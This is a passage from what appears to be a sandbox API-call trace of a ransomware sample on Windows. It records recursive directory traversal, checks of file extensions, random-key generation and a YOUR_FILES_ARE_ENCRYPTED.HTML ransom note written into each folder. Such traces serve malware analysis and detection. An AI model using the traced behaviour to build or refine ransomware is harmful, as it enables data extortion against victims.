dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.015] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.015] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.016] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\desktop.ini") returned 77 [0155.016] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.016] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0155.016] lstrlenW (lpString=".ini") returned 4 [0155.016] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0155.016] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, 
nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0155.016] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.016] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0155.016] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\s-1-5-21-3683305739-1236715609-858405165-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.018] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.021] CloseHandle (hObject=0x4a4) returned 1 [0155.022] GetProcessHeap () returned 0x270000 [0155.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.023] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd6898390, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd6898390, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd6898390, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x76, cFileName="S-1-5-21-3683305739-1236715609-858405165-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0155.023] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.023] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 49 [0155.023] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\$recycle.bin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.024] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.026] CloseHandle (hObject=0x580) returned 1 [0155.026] GetProcessHeap () returned 0x270000 [0155.027] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.027] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdb0de4, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdb0de4, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="autoexec.bat", cAlternateFileName="")) returned 1 [0155.027] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\autoexec.bat") returned 19 [0155.027] lstrcmpW (lpString1="autoexec.bat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.027] PathFindExtensionW (pszPath="autoexec.bat") returned=".bat" [0155.027] lstrlenW (lpString=".bat") returned 4 [0155.027] PathFindExtensionW (pszPath="autoexec.bat") returned=".bat" [0155.028] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76130000 [0155.029] GetProcAddress (hModule=0x76130000, lpProcName="SystemFunction036") returned 0x76131919 [0155.029] SystemFunction036 (in: 
RandomBuffer=0x4ebe728, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebe728) returned 1 [0155.029] CreateFileW (lpFileName="\\\\?\\C:\\autoexec.bat" (normalized: "c:\\autoexec.bat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x580 [0155.029] GetFileSizeEx (in: hFile=0x580, lpFileSize=0x4ebe74c | out: lpFileSize=0x4ebe74c*=24) returned 1 [0155.029] CloseHandle (hObject=0x580) returned 1 [0155.029] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="Boot", cAlternateFileName="")) returned 1 [0155.029] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0155.030] GetProcessHeap () returned 0x270000 [0155.030] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.030] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0155.030] lstrcatW (in: lpString1="\\\\?\\C:\\Boot", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\*") returned="\\\\?\\C:\\Boot\\*" [0155.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x4506fa00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x4506fa00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xb0d7d660, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafdca9a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0155.030] lstrcmpW (lpString1="BCD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD") returned="" [0155.030] lstrlenW (lpString="") returned 0 [0155.030] PathFindExtensionW (pszPath="BCD") returned="" [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xafdca9a0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x6400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) 
returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0155.030] lstrcmpW (lpString1="BCD.LOG", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0155.030] lstrlenW (lpString=".LOG") returned 4 [0155.030] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0155.030] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec57a620, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0155.030] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0155.030] lstrcmpW (lpString1="BCD.LOG1", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.030] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0155.030] lstrlenW (lpString=".LOG1") returned 5 [0155.030] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec57a620, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec57a620, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec57a620, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0155.031] lstrcmpW (lpString1="BCD.LOG2", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.031] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0155.031] lstrlenW (lpString=".LOG2") returned 5 [0155.031] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec508200, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec508200, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0155.031] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.031] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0155.031] lstrlenW (lpString=".DAT") returned 4 [0155.031] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0155.031] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0155.031] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0155.031] GetProcessHeap () returned 0x270000 [0155.031] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.031] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\cs-CZ" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ") returned="\\\\?\\C:\\Boot\\cs-CZ" [0155.031] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*" [0155.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec449b20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f18da0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.032] wnsprintfW (in: 
pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0155.032] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.032] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.032] lstrlenW (lpString=".mui") returned 4 [0155.032] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.032] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f18da0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.033] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.033] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.033] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\cs-cz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.033] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.035] CloseHandle (hObject=0x4a4) returned 1 [0155.035] GetProcessHeap () returned 0x270000 [0155.036] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.037] FindNextFileW (in: 
hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0155.037] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0155.037] GetProcessHeap () returned 0x270000 [0155.037] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.037] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\da-DK" | out: lpString1="\\\\?\\C:\\Boot\\da-DK") returned="\\\\?\\C:\\Boot\\da-DK" [0155.037] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*") returned="\\\\?\\C:\\Boot\\da-DK\\*" [0155.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.038] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0155.038] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.038] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.038] lstrlenW (lpString=".mui") returned 4 [0155.038] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.038] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.038] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.038] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.038] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\boot\\da-dk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.039] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.041] CloseHandle (hObject=0x4a4) returned 1 [0155.041] GetProcessHeap () returned 0x270000 [0155.042] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.042] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f3ef00, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f3ef00, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0155.042] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0155.043] GetProcessHeap () returned 0x270000 [0155.043] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.043] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0155.043] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\de-DE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\de-DE\\*") returned="\\\\?\\C:\\Boot\\de-DE\\*" [0155.043] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec46fc80, ftCreationTime.dwHighDateTime=0x1d70562, 
